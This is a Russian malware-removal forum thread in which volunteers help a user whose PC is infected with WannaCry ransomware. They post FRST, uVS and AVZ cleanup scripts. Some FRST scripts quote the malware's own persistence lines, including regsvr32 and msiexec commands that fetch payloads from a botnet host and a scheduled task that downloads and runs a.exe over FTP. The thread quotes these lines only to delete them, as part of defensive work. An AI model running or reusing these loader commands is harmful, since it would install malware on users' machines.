Перейти к содержанию

Зашифрованные файлы @WanaDecryptor@.exe


Рекомендуемые сообщения

  • Запустите FRST/FRST64
  • Нажмите комбинацию Ctrl+y - откроется Блокнот
  • Скопируйте в него следующий код:

     

    Start::
    CreateRestorePoint:
    HKLM-x32\...\Run: [] => [X]
    HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
    GroupPolicy: Restriction <======= ATTENTION
    2017-05-12 16:57 - 2017-05-12 16:24 - 0000933 _____ () C:\Users\Каратель\AppData\Local\@Please_Read_Me@.txt
    2017-05-12 16:57 - 2017-05-12 16:24 - 0000722 _____ () C:\Users\Каратель\AppData\Local\@WanaDecryptor@.exe.lnk
    2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\Users\Все пользователи\haetqxjechxm392
    2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\ProgramData\haetqxjechxm392
    2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Каратель\Desktop\@WanaDecryptor@.bmp
    2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Public\Desktop\@WanaDecryptor@.bmp
    2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Default\Desktop\@WanaDecryptor@.bmp
    2017-05-12 17:34 - 2017-05-11 20:13 - 01440054 _____ C:\Users\Default User\Desktop\@WanaDecryptor@.bmp
    2017-05-12 16:57 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\Downloads\@Please_Read_Me@.txt
    2017-05-12 16:57 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\AppData\Local\@Please_Read_Me@.txt
    2017-05-12 16:57 - 2017-05-12 16:24 - 00000722 _____ C:\Users\Каратель\AppData\Local\@WanaDecryptor@.exe.lnk
    2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\Users\Все пользователи\haetqxjechxm392
    2017-05-12 16:24 - 2017-05-12 18:45 - 00000000 ___HD C:\ProgramData\haetqxjechxm392
    2017-05-12 16:24 - 2017-05-12 16:24 - 00000933 _____ C:\Users\Каратель\Desktop\@Please_Read_Me@.txt
    EmptyTemp:
    Reboot:
    End::
  • Сохраните (Ctrl+s) и закройте.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

Изменено пользователем regist
добавка
Ссылка на комментарий
Поделиться на другие сайты

Вообще их требуется 3, но хоть два как в первом посте прикрепите.


И

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{4f3c790b-93aa-4e74-b2f3-93845c13698e} <======= ATTENTION (Restriction - IP)

сами политику настраивали?

Ссылка на комментарий
Поделиться на другие сайты

Вообще их требуется 3, но хоть два как в первом посте прикрепите.

И

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{4f3c790b-93aa-4e74-b2f3-93845c13698e} <======= ATTENTION (Restriction - IP)

сами политику настраивали?

Скорее всего да !!!

Ссылка на комментарий
Поделиться на другие сайты

  • Запустите FRST/FRST64
  • Нажмите комбинацию Ctrl+y - откроется Блокнот
  • Скопируйте в него следующий код:

    Start::
    CreateRestorePoint:
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
    2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\Users\Все пользователи\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001
    2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\ProgramData\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001
    2017-05-12 21:05 - 2017-05-12 21:05 - 00003446 _____ C:\Windows\System32\Tasks\Mysa
    Task: {6DDF9EB5-32FA-4C42-9B68-06FA71F08326} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
    Reboot:
    End::
  • Сохраните (Ctrl+s) и закройте.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

  • Скачайте Universal Virus Sniffer (uVS)
  • Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  • Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

  • Подробнее читайте в руководстве Как подготовить лог UVS.
Ссылка на комментарий
Поделиться на другие сайты

 

  • Запустите FRST/FRST64
  • Нажмите комбинацию Ctrl+y - откроется Блокнот
  • Скопируйте в него следующий код:

    Start::
    CreateRestorePoint:
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q
    2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\Users\Все пользователи\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001
    2017-05-12 21:10 - 2017-05-12 21:10 - 00000000 ____H C:\ProgramData\6f0d33d1bfa0433c912ca1575cb8a2b0.00030001
    2017-05-12 21:05 - 2017-05-12 21:05 - 00003446 _____ C:\Windows\System32\Tasks\Mysa
    Task: {6DDF9EB5-32FA-4C42-9B68-06FA71F08326} - System32\Tasks\Mysa => cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
    Reboot:
    End::
  • Сохраните (Ctrl+s) и закройте.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

  • Скачайте Universal Virus Sniffer (uVS)
  • Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.

    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.

  • Дождитесь окончания работы программы и прикрепите лог к посту в теме.

    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".

  • Подробнее читайте в руководстве Как подготовить лог UVS.

 

ПК_2017-05-12_22-21-16.7z

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

Есть поле быстрого ответа внизу, не надо заниматься оверквотингом.


1)

  • Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
  • Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  • Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:
    ;uVS v4.0.2 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    BREG
    ;---------command-block---------
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.8\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.31.5\PSMACHINE_64.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.8\PSMACHINE_64.DLL
    delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
    apply
    restart
    
    
    
  • В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
  • Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер может быть перезагружен.

Обновление поставьте http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012212
И в будущем не забывайте своевременно обновляться.

 

Выполните скрипт в AVZ при наличии доступа в интернет:

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

Выполните рекомендации после лечения.
 

 

Больше помочь нечем.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
×
×
  • Создать...